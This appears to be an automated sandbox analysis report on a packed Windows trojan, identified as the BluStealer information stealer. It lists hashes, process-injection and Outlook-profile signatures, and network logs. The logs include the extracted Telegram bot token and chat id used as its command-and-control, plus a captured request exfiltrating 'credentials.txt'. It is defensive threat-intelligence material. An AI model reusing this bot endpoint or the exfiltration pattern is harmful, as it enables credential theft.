Analysis
-
max time kernel: 147s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-11-2022 05:31
Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
  Resource: win10v2004-20221111-en
General
-
Target: SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
Size: 1.2MB
MD5: 7f7ef456450f254a7bbb162af495a3d2
SHA1: b957c8cc73f9cc83cf1519a628b2f8382d52befc
SHA256: 02a4055e2fce4b14d2a07f2625c2329309c01dea5499294405ca78e1d800bd78
SHA512: a481c5de7cf000d30f6a28d4f8d6712295d6de062f64722ff264b423ae37d55dafba35676d63ed4ee68e465c1ce39082e4e48ad960f31a072d6c77f94bd731c6
SSDEEP: 24576:wM+L74mBfNUstzoh04C14jT7cIxSFD075acQrFclsFVTJWR22n8W5enV3mmb3r8n:f+ejTBC05lQrF6sFVTJkj8W5enV3mOI
Malware Config
-
Extracted
Family: blustealer
C2: https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage?chat_id=1251788325
Signatures
-
BluStealer
A modular information stealer written in Visual Basic.
-
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AppLaunch.exe
Key opened | \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AppLaunch.exe
Key opened | \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AppLaunch.exe
-
Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 3076 set thread context of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 4108 set thread context of 952 | 4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 96
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 58 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious use of SetWindowsHookEx (1 IoC)
pid | Process
4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
-
Suspicious use of WriteProcessMemory (13 IoCs)
description | pid | Process | procid_target
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 3076 wrote to memory of 4108 | 3076 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 94
PID 4108 wrote to memory of 952 | 4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 96
PID 4108 wrote to memory of 952 | 4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 96
PID 4108 wrote to memory of 952 | 4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 96
PID 4108 wrote to memory of 952 | 4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 96
PID 4108 wrote to memory of 952 | 4108 | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 96
-
outlook_office_path (1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AppLaunch.exe
-
outlook_win_path (1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AppLaunch.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe (PID 3076, level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe (PID 4108, level 2, child of 3076)
    Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (PID 952, level 3, child of 4108)
      Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      - Accesses Microsoft Outlook profiles
      - outlook_office_path
      - outlook_win_path
-
Network
-
DNS
Remote address: 8.8.8.8:53
Request: 151.122.125.40.in-addr.arpa IN PTR
Response: (empty)
-
DNS
Remote address: 8.8.8.8:53
Request: api.telegram.org IN A
Response: api.telegram.org IN A 149.154.167.220
-
HTTP
POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
Process: SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
Remote address: 149.154.167.220:443
Request:
POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 167
Host: api.telegram.org
Response:
HTTP/1.1 200 OK
Date: Tue, 22 Nov 2022 05:32:17 GMT
Content-Type: application/json
Content-Length: 404
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
HTTP
POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin
Process: SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
Remote address: 149.154.167.220:443
Request:
POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: api.telegram.org
Content-Length: 201
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 400 Bad Request
Date: Tue, 22 Nov 2022 05:32:48 GMT
Content-Type: application/json
Content-Length: 81
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
DNS
Remote address: 8.8.8.8:53
Request: 2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa IN PTR
Response: (empty)
-
DNS
Remote address: 8.8.8.8:53
Request: crl.godaddy.com IN A
Response:
crl.godaddy.com IN CNAME gdcrl.godaddy.com.akadns.net
gdcrl.godaddy.com.akadns.net IN A 192.124.249.36
gdcrl.godaddy.com.akadns.net IN A 192.124.249.41
gdcrl.godaddy.com.akadns.net IN A 192.124.249.31
-
HTTP
GET http://crl.godaddy.com/gdroot.crl
Remote address: 192.124.249.31:80
Request:
GET /gdroot.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.godaddy.com
Response:
HTTP/1.1 200 OK
Date: Tue, 22 Nov 2022 05:33:15 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 429
Connection: keep-alive
X-Sucuri-ID: 19031
Last-Modified: Mon, 27 Jun 2022 22:00:33 GMT
ETag: "1ad-5e2750c919e0b"
Cache-Control: public, no-transform, must-revalidate
Expires: Wed, 29 Jun 2022 08:23:08 GMT
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Sucuri-Cache: HIT
Accept-Ranges: bytes
-
HTTP
GET http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
Process: SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
Remote address: 192.124.249.41:80
Request:
GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.godaddy.com
Response:
HTTP/1.1 200 OK
Date: Tue, 22 Nov 2022 05:33:21 GMT
Content-Type: application/ocsp-response
Content-Length: 1697
Connection: keep-alive
X-Sucuri-ID: 19041
Content-Transfer-Encoding: Binary
Cache-Control: public, no-transform, must-revalidate
Last-Modified: Mon, 21 Nov 2022 20:10:13 GMT
Expires: Tue, 22 Nov 2022 20:10:13 GMT
ETag: "18a2bef6d3bd326990faa7d41a031ae2978128cb"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Sucuri-Cache: HIT
-
Flows
8 flows whose remote address and process columns were not extracted: 322 B, 7 packets each
-
149.154.167.220:443 | https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage | tls, http | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 1.3kB sent, 7.1kB received, 11 packets sent, 11 packets received
HTTP Request: POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
HTTP Response: 200
-
149.154.167.220:443 | https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin | tls, http | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 1.7kB sent, 6.7kB received, 14 packets sent, 11 packets received
HTTP Request: POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin
HTTP Response: 400
-
3 flows whose remote address and process columns were not extracted: 260 B, 5 packets each
-
192.124.249.31:80 | http://crl.godaddy.com/gdroot.crl | http | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 310 B sent, 1.1kB received, 4 packets sent, 3 packets received
HTTP Request: GET http://crl.godaddy.com/gdroot.crl
HTTP Response: 200
-
192.124.249.41:80 | http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D | http | SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe | 404 B sent, 2.4kB received, 4 packets sent, 4 packets received
HTTP Request: GET http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
HTTP Response: 200
-
73 B sent, 159 B received, 1 packet sent, 1 packet received
DNS Request: 151.122.125.40.in-addr.arpa
-
62 B sent, 78 B received, 1 packet sent, 1 packet received
DNS Request: api.telegram.org
DNS Response: 149.154.167.220
-
118 B sent, 204 B received, 1 packet sent, 1 packet received
DNS Request: 2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
-
61 B sent, 151 B received, 1 packet sent, 1 packet received
DNS Request: crl.godaddy.com
DNS Response: 192.124.249.36, 192.124.249.41, 192.124.249.31